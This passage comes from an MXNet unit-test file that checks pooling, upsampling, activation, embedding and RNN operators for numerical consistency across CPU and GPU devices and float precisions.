check_consistency(sym, ctx_list, grad_req="add") # Checking max pooling consistency over the data sets of different float types is problematic # as one max value in a float32 data set may not be the max value in a float16 data set. # This function will not be called. @with_seed(1234) def test_pooling_with_type(): ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}, {'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}}, {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}}, {'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}] sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max') check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg') check_consistency(sym, ctx_list) # this is unstable # sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max') # check_consistency(sym, ctx_list) sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum') check_consistency(sym, ctx_list) @unittest.skip("Flaky test https://github.com/apache/incubator-mxnet/issues/11517") @with_seed() def test_pooling_versions(): def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride, pooling_convention='valid', global_pool=False, p_value=2, count_include_pad=True, tol=None): ctx_list = [] sym_list = [] # PoolingV1 cpu if 'pool_v1_cpu' in pool_op_list: ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, name='pool')) else: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool')) # PoolingV1 gpu if 'pool_v1_gpu' in pool_op_list: ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, name='pool')) else: sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool')) # Pooling cpu if 'pool_cpu' in pool_op_list: ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, name='pool', p_value=p_value, count_include_pad=count_include_pad)) else: sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool', p_value=p_value, count_include_pad=count_include_pad)) # Pooling gpu if 'pool_gpu' in pool_op_list: ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, cudnn_off=True, name='pool', p_value=p_value, count_include_pad=count_include_pad)) else: sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True, name='pool', p_value=p_value, count_include_pad=count_include_pad)) # CuDNNPooling if 'pool_cudnn' in pool_op_list: ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) if not global_pool: sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, p_value=p_value, cudnn_off=False, name='pool', count_include_pad=count_include_pad)) else: sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, p_value=p_value, cudnn_off=False, name='pool', count_include_pad=count_include_pad)) check_consistency(sym_list, ctx_list, equal_nan=(not count_include_pad), tol=tol) def test_1d_pooling(pool_type, p_value=2, count_include_pad=True): data = (2, 3, 20) kernel = (4,) pad = (0,) stride = (1,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2,) stride = (2,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (0,) stride = (1,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2,) stride = (2,) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, p_value=p_value, count_include_pad=count_include_pad) def test_2d_pooling(pool_type, p_value=2, count_include_pad=True): data = (2, 3, 20, 20) kernel = (4, 5) pad = (0, 0) stride = (1, 1) if pool_type == 'lp': test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value) else: test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, count_include_pad=count_include_pad) # pool_v1 has bugs when pad is not 0, do not test PoolingV1 here pad = (2, 3) stride = (2, 3) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (0, 0) stride = (1, 1) if pool_type == 'lp': test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value) else: if count_include_pad: test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, count_include_pad=count_include_pad) else: test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, count_include_pad=count_include_pad) # pool_v1 has bugs when pad is not 0, do not test PoolingV1 here pad = (2, 3) stride = (2, 3) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) if pool_type == 'lp': test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, p_value=p_value) else: test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, count_include_pad=count_include_pad) def test_3d_pooling(pool_type, p_value=2, count_include_pad=True): data = (2, 3, 20, 20, 20) kernel = (4, 5, 3) pad = (0, 0, 0) stride = (1, 1, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2, 3, 3) stride = (2, 3, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='valid', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (0, 0, 0) stride = (1, 1, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) pad = (2, 3, 3) stride = (2, 3, 1) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention='full', global_pool=False, p_value=p_value, count_include_pad=count_include_pad) test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'], data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, global_pool=True, p_value=p_value, count_include_pad=count_include_pad) test_1d_pooling('max') test_1d_pooling('avg', count_include_pad=True) test_1d_pooling('avg', count_include_pad=False) test_1d_pooling('sum') test_1d_pooling('lp', p_value=1) test_1d_pooling('lp', p_value=2) test_1d_pooling('lp', p_value=3) test_2d_pooling('max') test_2d_pooling('avg', count_include_pad=True) test_2d_pooling('avg', count_include_pad=False) test_2d_pooling('sum') test_2d_pooling('lp', p_value=1) test_2d_pooling('lp', p_value=2) test_2d_pooling('lp', p_value=3) test_3d_pooling('max') test_3d_pooling('avg', count_include_pad=True) test_3d_pooling('avg', count_include_pad=False) test_3d_pooling('sum') test_3d_pooling('lp', p_value=1) test_3d_pooling('lp', p_value=2) test_3d_pooling('lp', p_value=3) @with_seed() def test_global_pooling(): def test_1d_pooling(pool_type, p_value=2): data = (2, 3, 20) kernel = (4,) pad = (2,) stride = (2,) ctx_list = [] sym_list = [] pooling_convention = 'valid' ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool', p_value=p_value)) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) check_consistency(sym_list, ctx_list) def test_2d_pooling(pool_type, p_value=2): data = (2, 3, 20, 20) kernel = (4, 4) pad = (2, 2) stride = (2, 2) ctx_list = [] sym_list = [] pooling_convention = 'valid' if pool_type != 'lp': ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=False, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}}) sym_list.append(mx.sym.Pooling(pool_type=pool_type, pooling_convention=pooling_convention, global_pool=True, p_value=p_value, cudnn_off=True, name='pool')) check_consistency(sym_list, ctx_list) test_1d_pooling('max') test_1d_pooling('avg') test_1d_pooling('sum') test_1d_pooling('lp', p_value=1) test_1d_pooling('lp', p_value=2) test_1d_pooling('lp', p_value=3) test_2d_pooling('max') test_2d_pooling('avg') test_2d_pooling('sum') test_2d_pooling('lp', p_value=1) test_2d_pooling('lp', p_value=2) test_2d_pooling('lp', p_value=3) @with_seed() def test_upsampling_with_type(): sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1) ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}}, {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}, {'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}}, {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}}, {'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_upsampling_bilinear_with_type(): sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1) ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}}, {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}, {'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}}, {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}}, {'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_concat_with_type(): sym = mx.sym.Concat(name='concat', num_args=2) ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}}, {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}, {'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}}, {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}}, {'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10), 'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_elementwisesum_with_type(): dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]], [mx.cpu(0), [np.float64, np.float32]] ] for num_args in range(1, 6): ews_arg_shape = {} for i in range(num_args): ews_arg_shape['ews_arg'+str(i)] = (2, 10) sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args) ctx_list = [] for dev, types in dev_types: for dtype in types: ews_arg_dtype = {'type_dict':{}} for i in range(num_args): ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype ctx_elem = {'ctx': dev} ctx_elem.update(ews_arg_shape) ctx_elem.update(ews_arg_dtype) ctx_list.append(ctx_elem) check_consistency(sym, ctx_list) @with_seed() def test_reshape_with_type(): sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0)) ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}}, {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}, {'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}}, {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}}, {'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_blockgrad_with_type(): sym = mx.sym.BlockGrad(name='bg') ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}}, {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}, {'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}}, {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}}, {'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_swapaxis_with_type(): sym = mx.sym.SwapAxis(name='swap', dim1=1) ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}}, {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}, {'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}}, {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}}, {'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_fullyconnected_with_type(): sym = mx.sym.FullyConnected(num_hidden=3, name='inner') ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}}, {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}, {'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}}, {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}}, {'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}] check_consistency(sym, ctx_list) # Sizes are divisible by 8 to test TensorCore on Volta GPU. sym = mx.sym.FullyConnected(num_hidden=8, name='inner') ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}}, {'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_activation_with_type(): act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign'] shape = (2, 2, 10, 10) for act_type in act_types: sym = mx.sym.Activation(name='act', act_type=act_type) ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}}, {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}}, {'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}}, {'ctx': mx.cpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}}] check_consistency(sym, ctx_list) @with_seed() def test_lrn(): sym = mx.sym.LRN(alpha=0.0001, beta=0.75, knorm=2, nsize=5, name='lrn') ctx_list = [{'ctx': mx.gpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}, {'ctx': mx.cpu(0), 'lrn_data': (2, 6, 10, 10), 'type_dict': {'lrn_data': np.float32}}] check_consistency(sym, ctx_list) @with_seed() def test_embedding_with_type(): def test_embedding_helper(data_types, weight_types, low_pad, high_pad): NVD = [[20, 10, 20], [200, 10, 300]] for N, V, D in NVD: sym = mx.sym.Embedding(name='embedding', input_dim=V, output_dim=D) ctx_list = [] for data_type in data_types: for weight_type in weight_types: ctx_list.append({'ctx': mx.gpu(0), 'embedding_data': (N,), 'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}}) ctx_list.append({'ctx': mx.cpu(0), 'embedding_data': (N,), 'type_dict': {'embedding_data': data_type, 'embedding_weight': weight_type}}) arg_params = {'embedding_data': np.random.randint(low=-low_pad, high=V+high_pad, size=(N,))} check_consistency(sym, ctx_list, grad_req={'embedding_data': 'null','embedding_weight': 'write'}, arg_params=arg_params) data_types = [np.float16, np.float32, np.float64, np.int32] weight_types = [np.float16, np.float32, np.float64] test_embedding_helper(data_types, weight_types, 5, 5) data_types = [np.uint8] weight_types = [np.float16, np.float32, np.float64] test_embedding_helper(data_types, weight_types, 0, 5) @with_seed() def test_svmoutput_with_type(): sym = mx.sym.SVMOutput(name='svmoutput', use_linear=True) ctx_list = [{'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}}, {'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}}, {'ctx': mx.gpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}, {'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float64}}, {'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float32}}, {'ctx': mx.cpu(0), 'svmoutput_data': (20, 10), 'type_dict': {'svmoutput_data': np.float16}}] check_consistency(sym, ctx_list, use_uniform=True) @with_seed() def test_take_with_type(): sym = mx.sym.take(name='take') for data_ndim in range(2, 5): for idx_ndim in range(1, 4): data_shape = () for _ in range(data_ndim): data_shape += (np.random.randint(low=3, high=6), ) idx_shape = () for _ in range(idx_ndim): idx_shape += (np.random.randint(low=3, high=5), ) ctx_list = [{'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float64, 'take_a': np.float64}}, {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float32, 'take_a': np.float32}}, {'ctx': mx.gpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float16, 'take_a': np.float16}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float64, 'take_a': np.float64}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float32, 'take_a': np.float32}}, {'ctx': mx.cpu(0), 'take_indices': idx_shape, 'take_a': data_shape, 'type_dict': {'take_indices': np.float16, 'take_a': np.float16}}] arg_params = {'take_indices': np.random.randint(low=0, high=data_shape[0], size=idx_shape), 'take_a': np.random.normal(size=data_shape)} check_consistency(sym, ctx_list, grad_req={'take_indices': 'null', 'take_a': 'write'}, arg_params=arg_params) def check_rnn_consistency(cell1, cell2): dshape = (32, 5, 200) data = mx.sym.Variable('data') sym1, _ = cell1.unroll(5, data, merge_outputs=True) mod1 = mx.mod.Module(sym1, label_names=None, context=mx.gpu(0)) mod1.bind(data_shapes=[('data', dshape)], label_shapes=None) sym2, _ = cell2.unroll(5, data, merge_outputs=True) mod2 = mx.mod.Module(sym2, label_names=None, context=mx.gpu(0)) mod2.bind(data_shapes=[('data', dshape)], label_shapes=None) mod1.init_params() args, auxs = mod1.get_params() args = cell1.unpack_weights(args) args = cell2.pack_weights(args) mod2.set_params(args, auxs) batch=mx.io.DataBatch(data=[mx.random.uniform(shape=dshape)], label=[]) mod1.forward(batch, is_train=False) mod2.forward(batch, is_train=False) assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=1e-2, atol=1e-4) @with_seed() @assert_raises_cudnn_disabled() def test_rnn(): fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='rnn_relu', prefix='') stack = mx.rnn.SequentialRNNCell() stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l0_')) stack.add(mx.rnn.RNNCell(100, activation='relu', prefix='l1_')) check_rnn_consistency(fused, stack) check_rnn_consistency(stack, fused) @with_seed() @assert_raises_cudnn_disabled() def test_lstm_forget_bias(): forget_bias = 2.0 fused = mx.rnn.FusedRNNCell(10, forget_bias=forget_bias, num_layers=2, mode='lstm', prefix='') dshape = (32, 1, 20) data = mx.sym.Variable('data') sym, _ = fused.unroll(1, data, merge_outputs=True) mod = mx.mod.Module(sym, label_names=None, context=mx.gpu(0)) mod.bind(data_shapes=[('data', dshape)], label_shapes=None) mod.init_params() args, auxs = mod.get_params() args = fused.unpack_weights(args) bias_name = next(x for x in args if x.endswith('f_bias')) expected_bias = forget_bias * np.ones(10, ) assert_allclose(args[bias_name].asnumpy(), expected_bias) @with_seed() @assert_raises_cudnn_disabled() def test_gru(): fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='') stack = mx.rnn.SequentialRNNCell() stack.add(mx.rnn.GRUCell(100, prefix='l0_')) stack.add(mx.rnn.GRUCell(100, prefix='l1_')) check_rnn_consistency(fused, stack) check_rnn_consistency(stack, fused) @with_seed() @assert_raises_cudnn_disabled() def test_bidirectional(): fused = mx.rnn.FusedRNNCell(100, num_layers=2, mode='gru', prefix='', bidirectional=True) stack = mx.rnn.SequentialRNNCell() stack.add(mx.rnn.BidirectionalCell( mx.rnn.GRUCell(100, prefix='l0_'), mx.rnn.GRUCell(100, prefix='r0_'), output_prefix='bi_gru_0_')) stack.add(mx.rnn.BidirectionalCell( mx.rnn.GRUCell(100, prefix='l1_'), mx.rnn.GRUCell(100, prefix='r1_'), output_prefix='bi_gru_1_')) check_rnn_consistency(fused, stack) check_rnn_consistency(stack, fused) @with_seed() @assert_raises_cudnn_disabled() def test_unfuse(): for mode in ['rnn_tanh', 'rnn_relu', 'lstm', 'gru']: fused = mx.rnn.FusedRNNCell( 100, num_layers=2, mode=mode, prefix='test_%s'%mode, bidirectional=True, dropout=0.5) stack = fused.unfuse() 